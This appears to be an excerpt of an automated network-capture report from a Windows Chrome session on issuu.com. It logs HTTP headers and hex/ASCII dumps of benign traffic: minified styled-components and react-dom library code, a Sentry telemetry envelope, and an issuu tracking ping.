                                                                                                          Data Ascii: =(void 0===r||r.isStatic)&&F(e),this.componentId=t,this.baseHash=L(B,t),this.baseStyle=r,N.registerId(t)}return e.prototype.generateAndInjectStyles=function(e,t,r){var n=this.componentId,i=[];if(this.baseStyle&&i.push(this.baseStyle.generateAndInjectStyle
                                                                                                          2024-12-24 19:56:23 UTC1369INData Raw: 29 29 72 65 74 75 72 6e 20 74 2e 72 65 70 6c 61 63 65 28 67 2c 28 35 38 3d 3d 3d 65 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 3f 22 22 3a 22 24 31 22 29 2b 65 2e 74 72 69 6d 28 29 29 7d 72 65 74 75 72 6e 20 65 2b 74 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 65 2c 74 2c 72 2c 61 29 7b 76 61 72 20 6f 3d 65 2b 22 3b 22 2c 73 3d 32 2a 74 2b 33 2a 72 2b 34 2a 61 3b 69 66 28 39 34 34 3d 3d 3d 73 29 7b 65 3d 6f 2e 69 6e 64 65 78 4f 66 28 22 3a 22 2c 39 29 2b 31 3b 76 61 72 20 63 3d 6f 2e 73 75 62 73 74 72 69 6e 67 28 65 2c 6f 2e 6c 65 6e 67 74 68 2d 31 29 2e 74 72 69 6d 28 29 3b 72 65 74 75 72 6e 20 63 3d 6f 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 65 29 2e 74 72 69 6d 28 29 2b 63 2b 22 3b 22 2c 31 3d 3d 3d 52 7c 7c 32 3d 3d 3d 52 26 26 69 28 63 2c 31 29 3f 22 2d 77 65
                                                                                                          Data Ascii: ))return t.replace(g,(58===e.charCodeAt(0)?"":"$1")+e.trim())}return e+t}function n(e,t,r,a){var o=e+";",s=2*t+3*r+4*a;if(944===s){e=o.indexOf(":",9)+1;var c=o.substring(e,o.length-1).trim();return c=o.substring(0,e).trim()+c+";",1===R||2===R&&i(c,1)?"-we
                                                                                                          2024-12-24 19:56:23 UTC1369INData Raw: 73 74 28 6f 29 3f 6f 2e 72 65 70 6c 61 63 65 28 66 2c 22 3a 2d 77 65 62 6b 69 74 2d 22 29 2b 6f 2e 72 65 70 6c 61 63 65 28 66 2c 22 3a 2d 6d 6f 7a 2d 22 29 2b 6f 3a 6f 3b 63 61 73 65 20 31 65 33 3a 73 77 69 74 63 68 28 74 3d 28 63 3d 6f 2e 73 75 62 73 74 72 69 6e 67 28 31 33 29 2e 74 72 69 6d 28 29 29 2e 69 6e 64 65 78 4f 66 28 22 2d 22 29 2b 31 2c 63 2e 63 68 61 72 43 6f 64 65 41 74 28 30 29 2b 63 2e 63 68 61 72 43 6f 64 65 41 74 28 74 29 29 7b 63 61 73 65 20 32 32 36 3a 63 3d 6f 2e 72 65 70 6c 61 63 65 28 62 2c 22 74 62 22 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 33 32 3a 63 3d 6f 2e 72 65 70 6c 61 63 65 28 62 2c 22 74 62 2d 72 6c 22 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 32 30 3a 63 3d 6f 2e 72 65 70 6c 61 63 65 28 62 2c 22 6c 72 22 29 3b 62 72 65
                                                                                                          Data Ascii: st(o)?o.replace(f,":-webkit-")+o.replace(f,":-moz-")+o:o;case 1e3:switch(t=(c=o.substring(13).trim()).indexOf("-")+1,c.charCodeAt(0)+c.charCodeAt(t)){case 226:c=o.replace(b,"tb");break;case 232:c=o.replace(b,"tb-rl");break;case 220:c=o.replace(b,"lr");bre
                                                                                                          2024-12-24 19:56:23 UTC1369INData Raw: 22 29 29 2b 6f 3b 62 72 65 61 6b 3b 63 61 73 65 20 39 36 32 3a 69 66 28 6f 3d 22 2d 77 65 62 6b 69 74 2d 22 2b 6f 2b 28 31 30 32 3d 3d 3d 6f 2e 63 68 61 72 43 6f 64 65 41 74 28 35 29 3f 22 2d 6d 73 2d 22 2b 6f 3a 22 22 29 2b 6f 2c 32 31 31 3d 3d 3d 72 2b 61 26 26 31 30 35 3d 3d 3d 6f 2e 63 68 61 72 43 6f 64 65 41 74 28 31 33 29 26 26 30 3c 6f 2e 69 6e 64 65 78 4f 66 28 22 74 72 61 6e 73 66 6f 72 6d 22 2c 31 30 29 29 72 65 74 75 72 6e 20 6f 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 6f 2e 69 6e 64 65 78 4f 66 28 22 3b 22 2c 32 37 29 2b 31 29 2e 72 65 70 6c 61 63 65 28 68 2c 22 24 31 2d 77 65 62 6b 69 74 2d 24 32 22 29 2b 6f 7d 72 65 74 75 72 6e 20 6f 7d 66 75 6e 63 74 69 6f 6e 20 69 28 65 2c 74 29 7b 76 61 72 20 72 3d 65 2e 69 6e 64 65 78 4f 66 28 31 3d 3d 3d
                                                                                                          Data Ascii: "))+o;break;case 962:if(o="-webkit-"+o+(102===o.charCodeAt(5)?"-ms-"+o:"")+o,211===r+a&&105===o.charCodeAt(13)&&0<o.indexOf("transform",10))return o.substring(0,o.indexOf(";",27)+1).replace(h,"$1-webkit-$2")+o}return o}function i(e,t){var r=e.indexOf(1===


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          7192.168.2.449755104.17.24.144435104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-24 19:56:23 UTC402OUTGET /ajax/libs/react-dom/17.0.2/umd/react-dom.production.min.js HTTP/1.1
                                                                                                          Host: cdnjs.cloudflare.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-24 19:56:23 UTC961INHTTP/1.1 200 OK
                                                                                                          Date: Tue, 24 Dec 2024 19:56:23 GMT
                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Cache-Control: public, max-age=30672000
                                                                                                          ETag: W/"605933ce-1d709"
                                                                                                          Last-Modified: Tue, 23 Mar 2021 00:18:22 GMT
                                                                                                          cf-cdnjs-via: cfworker/kv
                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                          Timing-Allow-Origin: *
                                                                                                          X-Content-Type-Options: nosniff
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 424973
                                                                                                          Expires: Sun, 14 Dec 2025 19:56:23 GMT
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gcjBqMS2oQZRUvDCb3AIal5C%2BN0QacwNp8Sn5wvZC1pJ3LU6QnRl4QdtKgzyAjVUtF634KgmxZjn%2Fd1387b%2FkbQxOZeCWHghHq0lkI%2FjfMQAAIOlgh20mSLaA9A0DIqMlvt14nZm"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                          Strict-Transport-Security: max-age=15780000
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f7327884b0017e9-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          2024-12-24 19:56:23 UTC408INData Raw: 33 39 37 35 0d 0a 2f 2a 2a 20 40 6c 69 63 65 6e 73 65 20 52 65 61 63 74 20 76 31 37 2e 30 2e 32 0a 20 2a 20 72 65 61 63 74 2d 64 6f 6d 2e 70 72 6f 64 75 63 74 69 6f 6e 2e 6d 69 6e 2e 6a 73 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 46 61 63 65 62 6f 6f 6b 2c 20 49 6e 63 2e 20 61 6e 64 20 69 74 73 20 61 66 66 69 6c 69 61 74 65 73 2e 0a 20 2a 0a 20 2a 20 54 68 69 73 20 73 6f 75 72 63 65 20 63 6f 64 65 20 69 73 20 6c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 20 66 6f 75 6e 64 20 69 6e 20 74 68 65 0a 20 2a 20 4c 49 43 45 4e 53 45 20 66 69 6c 65 20 69 6e 20 74 68 65 20 72 6f 6f 74 20 64 69 72 65 63 74 6f 72 79 20 6f 66 20 74 68 69 73 20 73 6f 75 72 63 65 20 74 72 65 65 2e 0a 20 2a 2f 0a 28 66 75
                                                                                                          Data Ascii: 3975/** @license React v17.0.2 * react-dom.production.min.js * * Copyright (c) Facebook, Inc. and its affiliates. * * This source code is licensed under the MIT license found in the * LICENSE file in the root directory of this source tree. */(fu
                                                                                                          2024-12-24 19:56:23 UTC1369INData Raw: 71 75 69 72 65 28 22 72 65 61 63 74 22 29 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 65 78 70 6f 72 74 73 22 2c 22 72 65 61 63 74 22 5d 2c 68 61 29 3a 28 4d 3d 4d 7c 7c 73 65 6c 66 2c 68 61 28 4d 2e 52 65 61 63 74 44 4f 4d 3d 7b 7d 2c 4d 2e 52 65 61 63 74 29 29 7d 29 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 4d 2c 68 61 29 7b 66 75 6e 63 74 69 6f 6e 20 6d 28 61 29 7b 66 6f 72 28 76 61 72 20 62 3d 22 68 74 74 70 73 3a 2f 2f 72 65 61 63 74 6a 73 2e 6f 72 67 2f 64 6f 63 73 2f 65 72 72 6f 72 2d 64 65 63 6f 64 65 72 2e 68 74 6d 6c 3f 69 6e 76 61 72 69 61 6e 74 3d 22 2b 61 2c 63 3d 31 3b 63 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 63 2b 2b
                                                                                                          Data Ascii: quire("react")):"function"===typeof define&&define.amd?define(["exports","react"],ha):(M=M||self,ha(M.ReactDOM={},M.React))})(this,function(M,ha){function m(a){for(var b="https://reactjs.org/docs/error-decoder.html?invariant="+a,c=1;c<arguments.length;c++
                                                                                                          2024-12-24 19:56:23 UTC1369INData Raw: 63 74 69 6f 6e 20 45 64 28 61 2c 62 2c 63 2c 64 29 7b 76 61 72 20 65 3d 49 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 62 29 3f 49 5b 62 5d 3a 6e 75 6c 6c 3b 76 61 72 20 66 3d 6e 75 6c 6c 21 3d 3d 65 3f 30 3d 3d 3d 65 2e 74 79 70 65 3a 64 3f 21 31 3a 21 28 32 3c 62 2e 6c 65 6e 67 74 68 29 7c 7c 0a 22 6f 22 21 3d 3d 62 5b 30 5d 26 26 22 4f 22 21 3d 3d 62 5b 30 5d 7c 7c 22 6e 22 21 3d 3d 62 5b 31 5d 26 26 22 4e 22 21 3d 3d 62 5b 31 5d 3f 21 31 3a 21 30 3b 66 7c 7c 28 6f 69 28 62 2c 63 2c 65 2c 64 29 26 26 28 63 3d 6e 75 6c 6c 29 2c 64 7c 7c 6e 75 6c 6c 3d 3d 3d 65 3f 6c 69 28 62 29 26 26 28 6e 75 6c 6c 3d 3d 3d 63 3f 61 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 62 29 3a 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 62 2c 22 22 2b 63 29 29 3a 65
                                                                                                          Data Ascii: ction Ed(a,b,c,d){var e=I.hasOwnProperty(b)?I[b]:null;var f=null!==e?0===e.type:d?!1:!(2<b.length)||"o"!==b[0]&&"O"!==b[0]||"n"!==b[1]&&"N"!==b[1]?!1:!0;f||(oi(b,c,e,d)&&(c=null),d||null===e?li(b)&&(null===c?a.removeAttribute(b):a.setAttribute(b,""+c)):e
                                                                                                          2024-12-24 19:56:23 UTC1369INData Raw: 7c 31 21 3d 3d 68 29 7b 64 6f 20 69 66 28 67 2d 2d 2c 68 2d 2d 2c 30 3e 68 7c 7c 65 5b 67 5d 21 3d 3d 66 5b 68 5d 29 72 65 74 75 72 6e 22 5c 6e 22 2b 65 5b 67 5d 2e 72 65 70 6c 61 63 65 28 22 20 61 74 20 6e 65 77 20 22 2c 22 20 61 74 20 22 29 3b 77 68 69 6c 65 28 31 3c 3d 67 26 26 30 3c 3d 68 29 7d 62 72 65 61 6b 7d 7d 7d 66 69 6e 61 6c 6c 79 7b 47 64 3d 21 31 2c 45 72 72 6f 72 2e 70 72 65 70 61 72 65 53 74 61 63 6b 54 72 61 63 65 3d 63 7d 72 65 74 75 72 6e 28 61 3d 61 3f 61 2e 64 69 73 70 6c 61 79 4e 61 6d 65 7c 7c 61 2e 6e 61 6d 65 3a 22 22 29 3f 4b 62 28 61 29 3a 22 22 7d 66 75 6e 63 74 69 6f 6e 20 70 69 28 61 29 7b 73 77 69 74 63 68 28 61 2e 74 61 67 29 7b 63 61 73 65 20 35 3a 72 65 74 75 72 6e 20 4b 62 28 61 2e 74 79 70 65 29 3b 63 61 73 65 20 31 36
                                                                                                          Data Ascii: |1!==h){do if(g--,h--,0>h||e[g]!==f[h])return"\n"+e[g].replace(" at new "," at ");while(1<=g&&0<=h)}break}}}finally{Gd=!1,Error.prepareStackTrace=c}return(a=a?a.displayName||a.name:"")?Kb(a):""}function pi(a){switch(a.tag){case 5:return Kb(a.type);case 16
                                                                                                          2024-12-24 19:56:23 UTC1369INData Raw: 2e 74 79 70 65 3b 72 65 74 75 72 6e 28 61 3d 61 2e 6e 6f 64 65 4e 61 6d 65 29 26 26 22 69 6e 70 75 74 22 3d 3d 3d 61 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 26 26 28 22 63 68 65 63 6b 62 6f 78 22 3d 3d 3d 62 7c 7c 22 72 61 64 69 6f 22 3d 3d 3d 62 29 7d 66 75 6e 63 74 69 6f 6e 20 71 69 28 61 29 7b 76 61 72 20 62 3d 45 66 28 61 29 3f 22 63 68 65 63 6b 65 64 22 3a 22 76 61 6c 75 65 22 2c 63 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 61 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2e 70 72 6f 74 6f 74 79 70 65 2c 62 29 2c 64 3d 22 22 2b 61 5b 62 5d 3b 69 66 28 21 61 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 62 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 3d 74 79 70 65 6f 66 20 63 26 26 22 66 75 6e 63
                                                                                                          Data Ascii: .type;return(a=a.nodeName)&&"input"===a.toLowerCase()&&("checkbox"===b||"radio"===b)}function qi(a){var b=Ef(a)?"checked":"value",c=Object.getOwnPropertyDescriptor(a.constructor.prototype,b),d=""+a[b];if(!a.hasOwnProperty(b)&&"undefined"!==typeof c&&"func
                                                                                                          2024-12-24 19:56:23 UTC1369INData Raw: 74 72 6f 6c 6c 65 64 3a 22 63 68 65 63 6b 62 6f 78 22 3d 3d 3d 62 2e 74 79 70 65 7c 7c 22 72 61 64 69 6f 22 3d 3d 3d 62 2e 74 79 70 65 3f 6e 75 6c 6c 21 3d 62 2e 63 68 65 63 6b 65 64 3a 6e 75 6c 6c 21 3d 62 2e 76 61 6c 75 65 7d 7d 66 75 6e 63 74 69 6f 6e 20 48 66 28 61 2c 62 29 7b 62 3d 62 2e 63 68 65 63 6b 65 64 3b 6e 75 6c 6c 21 3d 62 26 26 45 64 28 61 2c 22 63 68 65 63 6b 65 64 22 2c 0a 62 2c 21 31 29 7d 66 75 6e 63 74 69 6f 6e 20 4e 64 28 61 2c 62 29 7b 48 66 28 61 2c 62 29 3b 76 61 72 20 63 3d 78 61 28 62 2e 76 61 6c 75 65 29 2c 64 3d 62 2e 74 79 70 65 3b 69 66 28 6e 75 6c 6c 21 3d 63 29 69 66 28 22 6e 75 6d 62 65 72 22 3d 3d 3d 64 29 7b 69 66 28 30 3d 3d 3d 63 26 26 22 22 3d 3d 3d 61 2e 76 61 6c 75 65 7c 7c 61 2e 76 61 6c 75 65 21 3d 63 29 61 2e 76
                                                                                                          Data Ascii: trolled:"checkbox"===b.type||"radio"===b.type?null!=b.checked:null!=b.value}}function Hf(a,b){b=b.checked;null!=b&&Ed(a,"checked",b,!1)}function Nd(a,b){Hf(a,b);var c=xa(b.value),d=b.type;if(null!=c)if("number"===d){if(0===c&&""===a.value||a.value!=c)a.v
                                                                                                          2024-12-24 19:56:23 UTC1369INData Raw: 2e 76 61 6c 75 65 29 2c 61 5b 63 5d 2e 73 65 6c 65 63 74 65 64 21 3d 3d 65 26 26 28 61 5b 63 5d 2e 73 65 6c 65 63 74 65 64 3d 65 29 2c 65 26 26 64 26 26 28 61 5b 63 5d 2e 64 65 66 61 75 6c 74 53 65 6c 65 63 74 65 64 3d 21 30 29 7d 65 6c 73 65 7b 63 3d 22 22 2b 78 61 28 63 29 3b 62 3d 6e 75 6c 6c 3b 66 6f 72 28 65 3d 30 3b 65 3c 61 2e 6c 65 6e 67 74 68 3b 65 2b 2b 29 7b 69 66 28 61 5b 65 5d 2e 76 61 6c 75 65 3d 3d 3d 63 29 7b 61 5b 65 5d 2e 73 65 6c 65 63 74 65 64 3d 21 30 3b 64 26 26 28 61 5b 65 5d 2e 64 65 66 61 75 6c 74 53 65 6c 65 63 74 65 64 3d 21 30 29 3b 72 65 74 75 72 6e 7d 6e 75 6c 6c 21 3d 3d 62 7c 7c 61 5b 65 5d 2e 64 69 73 61 62 6c 65 64 7c 7c 28 62 3d 61 5b 65 5d 29 7d 6e 75 6c 6c 21 3d 3d 62 26 26 28 62 2e 73 65 6c 65 63 74 65 64 3d 21 30 29
                                                                                                          Data Ascii: .value),a[c].selected!==e&&(a[c].selected=e),e&&d&&(a[c].defaultSelected=!0)}else{c=""+xa(c);b=null;for(e=0;e<a.length;e++){if(a[e].value===c){a[e].selected=!0;d&&(a[e].defaultSelected=!0);return}null!==b||a[e].disabled||(b=a[e])}null!==b&&(b.selected=!0)
                                                                                                          2024-12-24 19:56:23 UTC1369INData Raw: 6f 66 20 62 7c 7c 30 3d 3d 3d 62 7c 7c 4e 62 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 61 29 26 26 4e 62 5b 61 5d 3f 28 22 22 2b 62 29 2e 74 72 69 6d 28 29 3a 62 2b 22 70 78 22 7d 66 75 6e 63 74 69 6f 6e 20 4f 66 28 61 2c 62 29 7b 61 3d 61 2e 73 74 79 6c 65 3b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 62 29 69 66 28 62 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 63 29 29 7b 76 61 72 20 64 3d 30 3d 3d 3d 63 2e 69 6e 64 65 78 4f 66 28 22 2d 2d 22 29 2c 65 3d 4e 66 28 63 2c 62 5b 63 5d 2c 64 29 3b 22 66 6c 6f 61 74 22 3d 3d 3d 63 26 26 28 63 3d 22 63 73 73 46 6c 6f 61 74 22 29 3b 64 3f 61 2e 73 65 74 50 72 6f 70 65 72 74 79 28 63 2c 65 29 3a 61 5b 63 5d 3d 65 7d 7d 66 75 6e 63 74 69 6f 6e 20 53 64 28 61 2c 62 29 7b 69 66 28 62 29 7b 69 66 28 73 69 5b
                                                                                                          Data Ascii: of b||0===b||Nb.hasOwnProperty(a)&&Nb[a]?(""+b).trim():b+"px"}function Of(a,b){a=a.style;for(var c in b)if(b.hasOwnProperty(c)){var d=0===c.indexOf("--"),e=Nf(c,b[c],d);"float"===c&&(c="cssFloat");d?a.setProperty(c,e):a[c]=e}}function Sd(a,b){if(b){if(si[
                                                                                                          2024-12-24 19:56:23 UTC1369INData Raw: 66 28 61 2c 62 2c 63 29 7d 66 69 6e 61 6c 6c 79 7b 59 64 3d 21 31 2c 57 64 28 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 50 62 28 61 2c 62 29 7b 76 61 72 20 63 3d 61 2e 73 74 61 74 65 4e 6f 64 65 3b 69 66 28 6e 75 6c 6c 3d 3d 3d 63 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 64 3d 48 63 28 63 29 3b 0a 69 66 28 6e 75 6c 6c 3d 3d 3d 64 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 63 3d 64 5b 62 5d 3b 61 3a 73 77 69 74 63 68 28 62 29 7b 63 61 73 65 20 22 6f 6e 43 6c 69 63 6b 22 3a 63 61 73 65 20 22 6f 6e 43 6c 69 63 6b 43 61 70 74 75 72 65 22 3a 63 61 73 65 20 22 6f 6e 44 6f 75 62 6c 65 43 6c 69 63 6b 22 3a 63 61 73 65 20 22 6f 6e 44 6f 75 62 6c 65 43 6c 69 63 6b 43 61 70 74 75 72 65 22 3a 63 61 73 65 20 22 6f 6e 4d 6f 75 73 65 44 6f 77 6e 22 3a 63 61 73 65 20 22
                                                                                                          Data Ascii: f(a,b,c)}finally{Yd=!1,Wd()}}function Pb(a,b){var c=a.stateNode;if(null===c)return null;var d=Hc(c);if(null===d)return null;c=d[b];a:switch(b){case "onClick":case "onClickCapture":case "onDoubleClick":case "onDoubleClickCapture":case "onMouseDown":case "
                                                                                                          2024-12-24 19:56:24 UTC1369INData Raw: 62 72 65 61 6b 7d 69 66 28 65 2e 63 68 69 6c 64 3d 3d 3d 66 2e 63 68 69 6c 64 29 7b 66 6f 72 28 66 3d 65 2e 63 68 69 6c 64 3b 66 3b 29 7b 69 66 28 66 3d 3d 3d 63 29 72 65 74 75 72 6e 20 55 66 28 65 29 2c 61 3b 69 66 28 66 3d 3d 3d 64 29 72 65 74 75 72 6e 20 55 66 28 65 29 2c 62 3b 66 3d 66 2e 73 69 62 6c 69 6e 67 7d 74 68 72 6f 77 20 45 72 72 6f 72 28 6d 28 31 38 38 29 29 3b 7d 69 66 28 63 2e 72 65 74 75 72 6e 21 3d 3d 64 2e 72 65 74 75 72 6e 29 63 3d 65 2c 64 3d 66 3b 65 6c 73 65 7b 66 6f 72 28 76 61 72 20 67 3d 21 31 2c 68 3d 65 2e 63 68 69 6c 64 3b 68 3b 29 7b 69 66 28 68 3d 3d 3d 63 29 7b 67 3d 21 30 3b 63 3d 65 3b 64 3d 66 3b 62 72 65 61 6b 7d 69 66 28 68 3d 3d 3d 64 29 7b 67 3d 21 30 3b 64 3d 65 3b 63 3d 66 3b 62 72 65 61 6b 7d 68 3d 68 2e 73 69 62
                                                                                                          Data Ascii: break}if(e.child===f.child){for(f=e.child;f;){if(f===c)return Uf(e),a;if(f===d)return Uf(e),b;f=f.sibling}throw Error(m(188));}if(c.return!==d.return)c=e,d=f;else{for(var g=!1,h=e.child;h;){if(h===c){g=!0;c=e;d=f;break}if(h===d){g=!0;d=e;c=f;break}h=h.sib


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          8192.168.2.44975934.120.195.2494435104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-24 19:56:24 UTC753OUTPOST /api/4506104688082944/envelope/?sentry_key=20169667e5c7bfec02249a8341e145fa&sentry_version=7&sentry_client=sentry.javascript.browser%2F7.108.0 HTTP/1.1
                                                                                                          Host: o4505883345354752.ingest.sentry.io
                                                                                                          Connection: keep-alive
                                                                                                          Content-Length: 481
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Content-Type: text/plain;charset=UTF-8
                                                                                                          Accept: */*
                                                                                                          Origin: https://issuu.com
                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Referer: https://issuu.com/
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          2024-12-24 19:56:24 UTC481OUTData Raw: 7b 22 73 65 6e 74 5f 61 74 22 3a 22 32 30 32 34 2d 31 32 2d 32 34 54 31 39 3a 35 36 3a 32 31 2e 38 34 36 5a 22 2c 22 73 64 6b 22 3a 7b 22 6e 61 6d 65 22 3a 22 73 65 6e 74 72 79 2e 6a 61 76 61 73 63 72 69 70 74 2e 62 72 6f 77 73 65 72 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 37 2e 31 30 38 2e 30 22 7d 7d 0a 7b 22 74 79 70 65 22 3a 22 73 65 73 73 69 6f 6e 22 7d 0a 7b 22 73 69 64 22 3a 22 34 61 65 33 31 33 32 36 34 65 30 63 34 63 66 66 39 30 36 66 61 32 64 66 63 34 64 62 35 63 37 62 22 2c 22 69 6e 69 74 22 3a 74 72 75 65 2c 22 73 74 61 72 74 65 64 22 3a 22 32 30 32 34 2d 31 32 2d 32 34 54 31 39 3a 35 36 3a 32 31 2e 38 34 36 5a 22 2c 22 74 69 6d 65 73 74 61 6d 70 22 3a 22 32 30 32 34 2d 31 32 2d 32 34 54 31 39 3a 35 36 3a 32 31 2e 38 34 36 5a 22 2c 22 73 74 61
                                                                                                          Data Ascii: {"sent_at":"2024-12-24T19:56:21.846Z","sdk":{"name":"sentry.javascript.browser","version":"7.108.0"}}{"type":"session"}{"sid":"4ae313264e0c4cff906fa2dfc4db5c7b","init":true,"started":"2024-12-24T19:56:21.846Z","timestamp":"2024-12-24T19:56:21.846Z","sta
                                                                                                          2024-12-24 19:56:24 UTC530INHTTP/1.1 200 OK
                                                                                                          Server: nginx
                                                                                                          Date: Tue, 24 Dec 2024 19:56:24 GMT
                                                                                                          Content-Type: application/json
                                                                                                          vary: origin, access-control-request-method, access-control-request-headers
                                                                                                          access-control-allow-origin: *
                                                                                                          access-control-expose-headers: x-sentry-error,x-sentry-rate-limits,retry-after
                                                                                                          cross-origin-resource-policy: cross-origin
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Via: 1.1 google
                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                          Connection: close
                                                                                                          Transfer-Encoding: chunked
                                                                                                          2024-12-24 19:56:24 UTC12INData Raw: 32 0d 0a 7b 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 2{}0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          9192.168.2.44976535.241.35.1514435104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-24 19:56:26 UTC653OUTPOST /ping HTTP/1.1
                                                                                                          Host: pingback.issuu.com
                                                                                                          Connection: keep-alive
                                                                                                          Content-Length: 442
                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                          Content-Type: text/plain;charset=utf-8
                                                                                                          Accept: */*
                                                                                                          Origin: https://issuu.com
                                                                                                          Sec-Fetch-Site: same-site
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Referer: https://issuu.com/
                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: iutk=a475a053-8dec-4146-9a80-a502b4c74e1b
                                                                                                          2024-12-24 19:56:26 UTC442OUTData Raw: 7b 22 69 75 74 6b 22 3a 22 61 34 37 35 61 30 35 33 2d 38 64 65 63 2d 34 31 34 36 2d 39 61 38 30 2d 61 35 30 32 62 34 63 37 34 65 31 62 22 2c 22 74 79 70 65 22 3a 22 6d 6f 6e 69 74 6f 72 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 32 2e 32 2e 30 22 2c 22 6f 72 69 67 69 6e 22 3a 22 40 69 73 73 75 75 2f 74 72 61 63 6b 69 6e 67 2d 6d 69 63 72 6f 2d 76 31 38 2e 30 2e 32 22 2c 22 64 61 74 61 22 3a 5b 7b 22 76 65 72 73 69 6f 6e 22 3a 22 31 2e 30 2e 30 22 2c 22 74 79 70 65 22 3a 22 72 65 61 64 65 72 33 2e 6f 70 65 6e 65 64 22 2c 22 77 65 62 67 6c 22 3a 30 2c 22 6e 6f 5f 77 65 62 67 6c 22 3a 31 2c 22 63 6c 69 70 62 6f 61 72 64 22 3a 31 2c 22 6e 6f 5f 63 6c 69 70 62 6f 61 72 64 22 3a 30 2c 22 74 6f 75 63 68 22 3a 30 2c 22 6e 6f 5f 74 6f 75 63 68 22 3a 31 2c 22 61 74 74
                                                                                                          Data Ascii: {"iutk":"a475a053-8dec-4146-9a80-a502b4c74e1b","type":"monitor","version":"2.2.0","origin":"@issuu/tracking-micro-v18.0.2","data":[{"version":"1.0.0","type":"reader3.opened","webgl":0,"no_webgl":1,"clipboard":1,"no_clipboard":0,"touch":0,"no_touch":1,"att
                                                                                                          2024-12-24 19:56:26 UTC367INHTTP/1.1 200 OK
                                                                                                          access-control-allow-credentials: true
                                                                                                          access-control-allow-headers: Content-Type
                                                                                                          access-control-allow-methods: POST
                                                                                                          access-control-allow-origin: https://issuu.com
